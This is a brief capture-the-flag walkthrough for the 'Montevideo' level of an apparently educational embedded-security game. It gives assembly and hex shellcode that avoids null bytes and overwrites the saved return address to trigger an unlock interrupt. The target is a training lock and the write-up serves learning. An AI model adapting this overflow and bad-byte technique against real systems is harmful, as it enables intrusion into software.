# 7. Montevideo

# Challenge Overview

OVERVIEW

    - Lockitall developers  have rewritten the code  to conform to the
      internal secure development process.
    - This lock is attached the the LockIT Pro HSM-2.

# Solution

This challenge is very similar to Whitehorse expect for the strcpy command which will end the string at 0x00 which means we cant use.

445c:  3012 7e00      push	#0x7e
4460:  b012 4c45      call	#0x454c <INT>

Instead we can create the value and put it in r15:

mov #0x181, r15
sub #0x102, r15
push r15
call #0x454c
---
3f4081013f8002010f12b0124c45

adding the padding and srp overwrite:

3f4081013f8002010f12b0124c454141ee43

This works!

Nice intro to bad bytes.